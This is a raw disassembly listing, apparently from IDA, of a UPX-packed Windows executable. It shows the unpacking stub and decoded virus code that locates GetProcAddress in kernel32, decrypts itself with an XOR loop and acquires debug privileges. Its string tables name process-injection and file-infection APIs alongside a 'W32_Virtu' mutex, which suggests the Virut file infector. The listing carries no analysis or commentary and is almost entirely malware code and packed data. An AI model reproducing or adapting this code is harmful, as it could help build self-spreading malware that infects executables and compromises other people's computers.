dd 0D6ABAAF5h, 0BFEC34C7h, 0AAF9FFFCh, 2A25B459h, 0ACC9662Ah
dd 0B7819093h, 83639D90h, 9271CDC9h, 17DD8430h, 3519BFFEh
dd 95D91451h, 2A91720Ah, 68EBC871h, 0D21FFFFFh, 80D512A5h
dd 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh, 0DFDBFFFFh
dd 9BAB9EC3h, 20A319DBh, 0DDA26CECh, 9EED85BDh, 81E8A2DFh
dd 125544EBh, 0FFF9A1C8h, 961FBDB7h, 12EB8D2Eh, 5A9A85D8h
dd 9A099D12h, 96F8105Ah, 613FF76Dh, 664922D0h, 12FEFD7Fh
dd 0C25AA987h, 680C0295h, 1285EDDBh, 5A910482h, 7FCFF7CBh
dd 0FF372139h, 4D53FF85h, 53187242h, 0FCFEFFC8h, 62FE97FFh
dd 43500200h, 57544583h, 204B524Fh, 474F5250h, 204D4152h
dd 7DAC5231h, 4C17CD6Bh, 24D4E41h, 56EBAB0Ah, 15661D6Ah
dd 676B03B7h, 0D2DD6EBBh, 0E707576h, 27611A33h, 5832234Dh
dd 96C3E54Ch, 32323221h, 79D6312Eh, 18DA6B06h, 8B323C20h
dd 50BB73A4h, 2207192Bh, 5123FF0Ch, 7D8363h, 140A1104h
dd 0FD40520h, 0A0BB5BD1h, 4B4C0069h, 0B7505353h, 923DBF97h
dd 0E00882E0h, 2400574Ah, 64006Eh, 0EE6D8B6Fh, 73007502h
dd 130743Ah, 0D912DB09h, 398CDBh, 2E1D2335h, 0D913907h
dd 0ABDA0098h, 49922008h, 57DAE406h, 6760D89Fh, 0F2000370h
dd 7472346h, 3203C8DCh, 6000640h, 237F0110h, 151FFFFAh
dd 48E0888Ah, 44004F00h, 7A6A19FEh, 6F49E4F2h, 1CFFB022h
dd 2530AF28h, 53671074h, 0D7DF5CE1h, 7590A796h, 5C040030h
dd 0BAEEBD07h, 85A35D7h, 2E4D615Ch, 38003607h, 46C6EDB1h
dd 1B30772Eh, 43EC0049h, 336761CFh, 633F00E8h, 2DBFA264h
dd 0DC08201Fh, 0FF164004h, 0DEDE00h, 0E41EC242h, 9F16000Eh
dd 40260201h, 6137EFB8h, 11031928h, 97D96C8Bh, 7468D835h
dd 2A9B70D3h, 852DB69Ch, 9F256B7Ch, 0EB480E10h, 47B03BAh
dd 5413541Bh, 3F63265Ah, 59ADB9F7h, 0CBC75C22h, 5876545h
dd 907BD800h, 10030BE6h, 0B810B848h, 0FD8F0B0Eh, 6A05BFFFh
dd 0C391928h, 9B11D0B1h, 4FC000A8h, 5FF52ED9h, 0F68A885Dh
dd 0EBFC2FB2h, 9F11C91Ch, 102B3CE8h, 0CD16048h, 92BCA3F4h
dd 0A06045CFh, 470CA00Ch, 0B1879006h, 0CA0000Ch, 277FDF24h
dd 9004088h, 703EC00h, 8F60D900h, 401495F0h, 40707C4Fh
dd 1F0700BFh, 4314BD91h, 13857813h, 0F84F3C81h, 0A65BAB00h
dd 0F81013E9h, 0E31A8B2Fh
dd 0EFEFF39h, 4FBE4023h, 806183Ah, 0B9438884h, 7C9E4F10h
dd 1FFEEBAh, 200C10B8h, 3E420DADh, 7F0726CCh, 0E4AFD80Fh
dd 118BCB3h, 840F8470h, 0F200DF0Fh, 0F9521h, 0F0847F02h
dd 0F93C9B0h, 9A000F6Ch, 5BD911A8h, 13436F95h, 8127F958h
dd 586E691Fh, 72502050h, 0DB679000h, 1444614h, 906B3239h
dd 3C89F927h, 2751512h, 43005341h, 1C81AF64h, 7FEB0194h
dd 695FFF3h, 255C5CC6h, 70695C73h, 81662463h, 0FF071CECh
dd 2EA6A3E4h, 655300FFh, 75626544h, 85766967h, 0FD93A767h
dd 64411F46h, 5461756Ah, 6E656B6Fh, 93FB7317h, 6F4C36DCh
dd 56707512h, 65756C61h, 0B1A91741h, 704FB7EDh, 24636F28h
dd 43003473h, 1D4B062Ah, 333F6176h, 6CE0AFE3h, 6D4C7954h
dd 7F12BAF9h, 5F1565A3h, 79617254h, 430F3957h, 0A5B6A5B7h
dd 521E6135h, 54056F6Ch, 0AA546B68h, 56140C73h, 6D5CDF77h
dd 416D6EA6h, 78455328h, 8D6E3E7Bh, 35ACF4BEh, 22F3F54Bh
dd 50545448h, 0E25FBD83h, 32204012h, 4B4F205Bh, 6D010A0Dh
dd 4BEA56B7h, 2D0244A3h, 4B67044Ch, 315BECD9h, 7525203Ah
dd 56282F18h, 540F6B5Bh, 0A726B979h, 0AB518A70h, 8763D4CDh
dd 0D6062F15h, 0CBD53DCAh, 0CD72972Dh, 546B57A3h, 4473168h
dd 0FFFAF82Fh, 6468F74Ah, 8D73CFE9h, 6376736Dh, 68596A71h
dd 6977CFA9h, 0FBEC5DF5h, 5F32076Eh, 78EB7517h, 36380307h
dd 3734D34Dh, 33343536h, 3A69A569h, 307CBF7h, 20303132h
dd 39BB3B9Fh, 3D003833h, 0C833707h, 3536C832h, 320E3334h
dd 313220C8h, 0A56B7830h, 3AF7A426h, 0D8BBD9D0h, 533FFE5Eh
dd 5754464Fh, 5C455241h, 736F694Dh, 0D85CD76Fh, 0C3B07E1Ah
dd 7275435Ch, 0DC561572h, 885C573h, 525C0A6Fh, 239F6E75h
dd 0DA146F74h, 24D6A16Dh, 53203068h, 0ED87FB1Bh, 3FE728FFh
dd 64736E67h, 2B796A72h, 1980265h, 530064DCh, 155F0A51h
dd 0E4B619Ah, 664B4D6Ch, 0CD899087h, 0C549235Fh, 2F05538h
dd 0FF540A18h, 43205317h, 0DDA3EE5h, 76206762h, 58763FD5h
dd 6DECD96Ch, 23B53284h, 165B1B7Ch, 471A17B2h, 1F8D1723h
dd 931299BFh, 707379h, 0D62D6342h, 0C3208D1Ah, 1B132361h
dd 0ED6D80C0h, 9752206Dh, 443772DDh, 2D2DBB9Eh, 661220E4h
dd 0AC6D672Fh, 6C2FF62Ah, 632463C9h, 79746922h, 6E614D20h
dd 16C8051Eh, 31BC1AB9h, 146B0A8Ah, 0A24E2370h, 1BBC4ABh
dd 6488F6E8h, 6572463Fh, 0DF50C65h, 0FC01B8A5h, 4D746547h
dd 4665876Fh, 97F0066Bh, 6D614EE2h, 736C0168h, 95637274h
dd 0BBDEE05Bh, 706F430Ah, 9D0A1979h, 291F1445h, 326578DCh
dd 6F6F544Ah, 0FDA2936Ch, 337063BFh, 616E5332h, 6F687370h
dd 2B9C1974h, 126B7745h, 0F737232h, 3E358F54h, 2C5CC160h
dd 654E2118h, 87887478h, 6169C16Dh, 76455441h, 57FF6DBDh
dd 69616B0Bh, 726F4674h, 7B673C53h, 0B06A624Fh, 76AE8856h
dd 22DD442Ch, 6E6FEF8Dh, 0B6972F6h, 6573C83Ah, 646E6148h
dd 25EDB00Ch, 5E24477Bh, 6DD26E08h, 61EF7084h, 4493F05Ah
dd 6CEDB7A3h, 79645673h, 61984C14h, 866E492Bh, 66DD6ED8h
dd 9530F6Fh, 49067065h, 0E02CD998h, 656B260Dh, 0B3284564h
dd 36623364h, 0E0CC366Eh, 0B9FEC447h, 64410B12h, 70F7264h
dd 7DECD836h, 7262694Ch, 2BB56761h, 0B2C2824Dh, 137CB9A2h
dd 9ED08ED5h, 63CF02CDh, 0B6816954h, 88B6B0E2h, 4DDE6575h
dd 66CD78E9h, 0CE341245h, 0F684590Dh, 39C45D86h, 0ACD8624Fh
dd 455A843Ch, 0B8DF3178h, 0A4B6DB1h, 2D6D1363h, 85D91B52h
dd 7B5926E7h, 657A8608h, 38216D38h, 154CA7B0h, 0CDDFC45h
dd 60C368D8h, 673A2BD1h, 67E77390h, 79654BA1h, 0B0861045h
dd 0C13B0ED6h, 0F60A510Fh, 0B0109B11h, 0E7309E97h, 61DEDD21h
dd 51E01016h, 2962410Ch, 6EA1070Ah, 46853BEh, 8AF6612Dh
dd 773B8643h, 0B05F6D36h, 0A108946h, 8E611244h, 0E98AEEDh
dd 7966696Eh, 0DB8F67CAh, 75B586D0h, 0CE6C362Bh, 0DC2C796Fh
dd 11D85BD9h, 8F52106Fh, 8D40E3Dh, 1DB4CC0Eh, 148FE436h
dd 75716341h, 494D7269h, 2B9C1669h, 133AA035h, 0B473ECDEh
dd 7273F0CDh, 0B26D06CAh, 5AE60E35h, 0F92862Ch, 1D1D4D53h
dd 5F76856Eh, 5F3F5844h, 7311F668h, 27F502B1h, 982B0702h
dd 7279B6CDh, 110E94Fh, 334D2291h, 1D294562h, 0D8B6527h
dd 150E0073h, 41BB0A14h, 0B4E73098h, 73776649h, 856ED9A7h
dd 66B10570h, 24F44F41h, 18A0D0F6h, 55855604h, 5B01489Bh
dd 0E1141D8h, 0DC1A967h, 36B144Bh, 9963496Eh, 534386E1h
dd 471A8174h, 2543AA3Bh, 73FFA10Dh, 6CB2CB2Ch, 10D0202h
dd 2CB26F39h, 1734B2CBh, 9304090Ch, 13CB2CAAh, 0F9361610h
dd 50D16AADh, 0DC960E45h, 40DD34h, 3FED9A00h, 10F00E0h
dd 0C06010Bh, 83B11226h, 34DC472Ch, 31421023h, 0C966E90Bh
dd 74A02A8h, 0EC0D600Ch, 341E2DCCh, 58840710h, 570692CEh
dd 2B098C2Dh, 6420176Ch, 831E017Ch, 2E8C516Dh, 9024A26Ah
dd 60241F26h, 49FC460h, 0F6642EE0h, 0E11ED90Dh, 2A0714FBh
dd 0E850D227h, 48C01616h, 2F81h, 54C3F800h, 24000000h
dd 0FF0000h, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_31426000
lea edi, [esi-5000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_31427BD2
; ---------------------------------------------------------------------------
align 8
loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_31427BCE: ; CODE XREF: UPX1:31427C66�j
; UPX1:31427C7D�j
add ebx, ebx
jnz short loc_31427BD9
loc_31427BD2: ; CODE XREF: UPX1:31427BC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BD9: ; CODE XREF: UPX1:31427BD0�j
jb short loc_31427BC8
mov eax, 1
loc_31427BE0: ; CODE XREF: UPX1:31427BEF�j
; UPX1:31427BFA�j
add ebx, ebx
jnz short loc_31427BEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427BEB: ; CODE XREF: UPX1:31427BE2�j
adc eax, eax
add ebx, ebx
jnb short loc_31427BE0
jnz short loc_31427BFC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427BE0
loc_31427BFC: ; CODE XREF: UPX1:31427BF1�j
xor ecx, ecx
sub eax, 3
jb short loc_31427C10
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_31427C82
mov ebp, eax
loc_31427C10: ; CODE XREF: UPX1:31427C01�j
add ebx, ebx
jnz short loc_31427C1B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C1B: ; CODE XREF: UPX1:31427C12�j
adc ecx, ecx
add ebx, ebx
jnz short loc_31427C28
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C28: ; CODE XREF: UPX1:31427C1F�j
adc ecx, ecx
jnz short loc_31427C4C
inc ecx
loc_31427C2D: ; CODE XREF: UPX1:31427C3C�j
; UPX1:31427C47�j
add ebx, ebx
jnz short loc_31427C38
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_31427C38: ; CODE XREF: UPX1:31427C2F�j
adc ecx, ecx
add ebx, ebx
jnb short loc_31427C2D
jnz short loc_31427C49
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_31427C2D
loc_31427C49: ; CODE XREF: UPX1:31427C3E�j
add ecx, 2
loc_31427C4C: ; CODE XREF: UPX1:31427C2A�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_31427C6C
loc_31427C5D: ; CODE XREF: UPX1:31427C64�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_31427C5D
jmp loc_31427BCE
; ---------------------------------------------------------------------------
align 4
loc_31427C6C: ; CODE XREF: UPX1:31427C5B�j
; UPX1:31427C79�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_31427C6C
add edi, ecx
jmp loc_31427BCE
; ---------------------------------------------------------------------------
loc_31427C82: ; CODE XREF: UPX1:31427C0C�j
pop esi
mov edi, esi
mov ecx, 7Eh
loc_31427C8A: ; CODE XREF: UPX1:31427C91�j
; UPX1:31427C96�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_31427C8F: ; CODE XREF: UPX1:31427CB4�j
cmp al, 1
ja short loc_31427C8A
cmp byte ptr [edi], 1
jnz short loc_31427C8A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_31427C8F
lea edi, [esi+5000h]
loc_31427CBC: ; CODE XREF: UPX1:31427CDE�j
mov eax, [edi]
or eax, eax
jz short loc_31427D07
mov ebx, [edi+4]
lea eax, [eax+esi+7000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+708Ch]
xchg eax, ebp
loc_31427CD9: ; CODE XREF: UPX1:31427CFF�j
mov al, [edi]
inc edi
or al, al
jz short loc_31427CBC
mov ecx, edi
jns short near ptr loc_31427CEA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_31427CEA: ; CODE XREF: UPX1:31427CE2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+7090h]
or eax, eax
jz short loc_31427D01
mov [ebx], eax
add ebx, 4
jmp short loc_31427CD9
; ---------------------------------------------------------------------------
loc_31427D01: ; CODE XREF: UPX1:31427CF8�j
call dword ptr [esi+7094h]
loc_31427D07: ; CODE XREF: UPX1:31427CC0�j
popa
jmp loc_31422334
; ---------------------------------------------------------------------------
align 400h
UPX1 ends
; Section 3. (virtual address 00008000)
; Virtual size : 00017000 ( 94208.)
; Section size in file : 00012600 ( 75264.)
; Offset to raw data for section: 00008000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX2 segment para public 'CODE' use32
assume cs:UPX2
;org 31428000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 3 dup(0)
dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 77C371D3h, 0
dd 7E41A8ADh, 0
dd 42C2C8A1h, 0
dd 71AB9639h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h
dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h
dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h
dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h
dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h
dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h
dd 6E65704Fh, 41h, 26h dup(0)
dd 0C3906893h, 0C48BED01h, 0E85BD0FFh, 5Fh, 824648Bh, 4EBB8h
dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 427500F8h
dd 0E8h, 0ED815D00h, 402338h, 2385858Bh, 85030040h, 40238Dh
dd 858BF08Bh, 402389h, 238D8503h, 60500040h, 0C933FE8Bh
dd 2395958Ah, 32AC0040h, 0AAD002C2h, 918D3B41h, 7C004023h
dd 2BC361F1h, 30FF64C0h, 0B8208964h, 12345678h, 60000387h
dd 7BB00000h, 0
dd 1E003142h, 29480000h, 8C8FEC0h, 750474C0h, 2967EBF8h
dd 0B1C929F6h, 754946DCh, 1DE8FCh, 0EF810000h, 0FFFFFFE0h
dd 243CB957h, 78A0000h, 86F02966h, 83494707h, 0F27700F9h
dd 5FE7FF5Fh, 0E890E7FFh, 0
; ---------------------------------------------------------------------------
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_31428316
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_3142830D
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_31428315
; ---------------------------------------------------------------------------
loc_3142830D: ; CODE XREF: UPX2:314282FE�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_31428315: ; CODE XREF: UPX2:3142830B�j
pop ebx
loc_31428316: ; CODE XREF: UPX2:314282E7�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 0D0h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 0
rep movsb
loc_3142833D: ; CODE XREF: UPX2:31428359�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_31428353
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_3142835B
loc_31428353: ; CODE XREF: UPX2:31428344�j
sub ebx, 100h
jnz short loc_3142833D
loc_3142835B: ; CODE XREF: UPX2:31428351�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_31428369: ; CODE XREF: UPX2:loc_31428390�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_31428390
cmp dword ptr [eax+3], 636F7250h
jnz short loc_31428390
cmp dword ptr [eax+7], 72646441h
jnz short loc_31428390
cmp dword ptr [eax+0Bh], 737365h
jz short loc_31428395
loc_31428390: ; CODE XREF: UPX2:31428373�j
; UPX2:3142837C�j ...
loop loc_31428369
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_31428395: ; CODE XREF: UPX2:3142838E�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_314283BB+2
inc ebx
insb
outsd
jnb short near ptr loc_31428419+2
dec eax
popa
outsb
db 64h
insb
loc_314283BB: ; CODE XREF: UPX2:314283AC�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_314283D7+1
inc ebx
jb short near ptr loc_31428432+1
popa
jz short near ptr loc_31428432+4
inc ebp
jbe short near ptr loc_31428438+1
outsb
jz short near ptr loc_31428416+2
loc_314283D7: ; CODE XREF: UPX2:314283C6�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_314283F3
inc edi
db 65h
jz short near ptr loc_31428432+4
popa
jnb short loc_31428461
inc ebp
jb short near ptr loc_31428461+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_314283F3 proc near ; CODE XREF: UPX2:314283E1�p
; FUNCTION CHUNK AT 3142849C SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 314285DC SIZE 0000013A BYTES
push ebx
call esi ; lstrcatA
mov [ebp+403544h], eax
call sub_31428471
test eax, eax
jz short loc_31428426
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_31428420
lea eax, [ebp+4011D2h]
loc_31428416: ; CODE XREF: UPX2:314283D5�j
mov dl, [eax-1]
loc_31428419: ; CODE XREF: UPX2:314283B4�j
call sub_3142848C
jmp short loc_3142849C
; ---------------------------------------------------------------------------
loc_31428420: ; CODE XREF: sub_314283F3+1B�j
; sub_314283F3+136�j ...
call dword ptr [ebp+40353Ch]
loc_31428426: ; CODE XREF: sub_314283F3+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31428450
loc_31428432: ; CODE XREF: UPX2:314283CC�j
; UPX2:314283CF�j ...
lea esi, [ebp+403435h]
loc_31428438: ; CODE XREF: UPX2:314283D2�j
mov edi, [esp+4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, [ebp+4039BAh]
loc_31428450: ; CODE XREF: sub_314283F3+3D�j
pop ebp
retn
sub_314283F3 endp
; ---------------------------------------------------------------------------
loc_31428452: ; CODE XREF: sub_31428471+2�p
; sub_314283F3:loc_3142865B�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_31428461: ; CODE XREF: UPX2:314283EB�j
; UPX2:314283EE�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_31428471 proc near ; CODE XREF: sub_314283F3+9�p
xor ecx, ecx
call loc_31428452
lea edx, [ebp+4011A1h]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_31428471 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142848C proc near ; CODE XREF: sub_314283F3:loc_31428419�p
; sub_3142A260+25B�p
mov dh, dl
mov ecx, 225Fh
loc_31428493: ; CODE XREF: sub_3142848C+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_31428493
retn
sub_3142848C endp
; ---------------------------------------------------------------------------
cld
; START OF FUNCTION CHUNK FOR sub_314283F3
loc_3142849C: ; CODE XREF: sub_314283F3+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr [ebp+401588h], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr [ebp+40397Eh]
loc_314284C3: ; CODE XREF: sub_314283F3+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add [ebp+40397Eh], edx
loop loc_314284C3
push edi
mov byte ptr [ebp+401303h], 1
mov [ebp+403548h], esi
lea esi, [ebp+4015BBh]
xor ecx, ecx
lea edi, [ebp+403558h]
mov cl, 1Eh
call sub_31428856
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_314285DC
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr [ebp+4035C8h]
test eax, eax
jz loc_31428420
xchg eax, edi
lea esi, [ebp+401000h]
mov ebp, edi
mov ecx, 0A74h
sub ebp, 401000h
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_314283F3
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, [ebp+401A3Dh]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_31428420
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_31428420
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_314285CC
jmp loc_31428420
; =============== S U B R O U T I N E =======================================
sub_314285CC proc near ; CODE XREF: UPX2:314285C2�p
; sub_314285CC+D�j
push 1
pop ecx
jecxz short locret_314285DB
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_314285CC
; ---------------------------------------------------------------------------
locret_314285DB: ; CODE XREF: sub_314285CC+3�j
retn
sub_314285CC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_314283F3
loc_314285DC: ; CODE XREF: sub_314283F3+10F�j
cmp dword ptr [ebp+403570h], 0
jz loc_31428420
call near ptr loc_314285F3+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_314285F3: ; CODE XREF: sub_314283F3+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_31428610+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_31428856
loc_31428610: ; CODE XREF: sub_314283F3+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_31428420
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, [ebp+4035DCh]
jecxz short loc_3142865B
push dword ptr [ecx+1]
pop dword ptr [ebp+4033F6h]
loc_3142865B: ; CODE XREF: sub_314283F3+25D�j
call loc_31428452
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, [ebp+40159Fh]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_314286A0: ; CODE XREF: sub_314283F3+2B0�j
lodsb
stosw
loop loc_314286A0
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr [ebp+4035E0h]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
test edi, edi
jz loc_31428420
lea esi, [ebp+401000h]
mov ecx, 0A74h
mov ebp, edi
rep movsd
sub ebp, 401000h
lea eax, [ebp+40144Ch]
jmp eax
; END OF FUNCTION CHUNK FOR sub_314283F3
; ---------------------------------------------------------------------------
dw 958Dh
dd 4018E0h, 9C95FF52h, 0E8004035h, 16h
aLookupprivil_0 db 'LookupPrivilegeValueA',0
dw 0FF50h
dd 40354895h, 4C858900h, 50004035h, 6A206A54h, 0EC95FFFFh
dd 85004035h, 3F755FC0h, 56026A96h, 6AD48B56h, 11E85201h
dd 53000000h, 62654465h, 72506775h, 6C697669h, 656765h
dd 4C95FF56h, 8B004035h, 565656C4h, 0FF575650h, 4035D095h
dd 10C48300h, 3C95FF57h, 6A004035h, 0FF026A00h, 40357095h
dd 128B900h, 2B970000h, 240C89E1h, 95FF5754h, 4035ACh
dd 0A583F633h, 40363Ch, 0FF575400h, 4035B095h, 74C08500h
dd 0FE83465Ch, 0FFEE7204h, 6A082474h, 0FF2A6A00h, 4035A895h
dd 74C08500h, 3DE893DCh, 33000004h, 30E391C9h, 363C8539h
dd 28750040h, 0DAEC181h, 54500000h, 50515650h, 95FF5350h
dd 403568h, 7459C085h, 2474FF0Fh, 3C858F08h, 0E8004036h
dd 0FFFFFDACh, 3C95FF53h, 0EB004035h, 28C48198h, 57000001h
dd 353C95FFh, 0E5E90040h, 8DFFFFFBh, 58580049h, 29CE0058h
dd 0D650000h, 3 dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_31428856 proc near ; CODE XREF: sub_314283F3+100�p
; sub_314283F3+218�p ...
push ecx
push esi
push ebx
call dword ptr [ebp+403548h]
stosd
pop ecx
loc_31428861: ; CODE XREF: sub_31428856+E�j
lodsb
test al, al
jnz short loc_31428861
loop sub_31428856
retn
sub_31428856 endp
; ---------------------------------------------------------------------------
aBasenamedobjec db '\BaseNamedObjects\W32_Virtu',0
aLstrlen db 'lstrlen',0
aCreatefilea db 'CreateFileA',0
aCreatefilemapp db 'CreateFileMappingA',0
aCreateprocessa db 'CreateProcessA',0
aCreateremote_0 db 'CreateRemoteThread',0
aCreatethread db 'CreateThread',0
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0
aExitthread db 'ExitThread',0
aFiletimetosyst db 'FileTimeToSystemTime',0
aGetfileattribu db 'GetFileAttributesA',0
aGetfilesize db 'GetFileSize',0
aGetfiletime db 'GetFileTime',0
aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
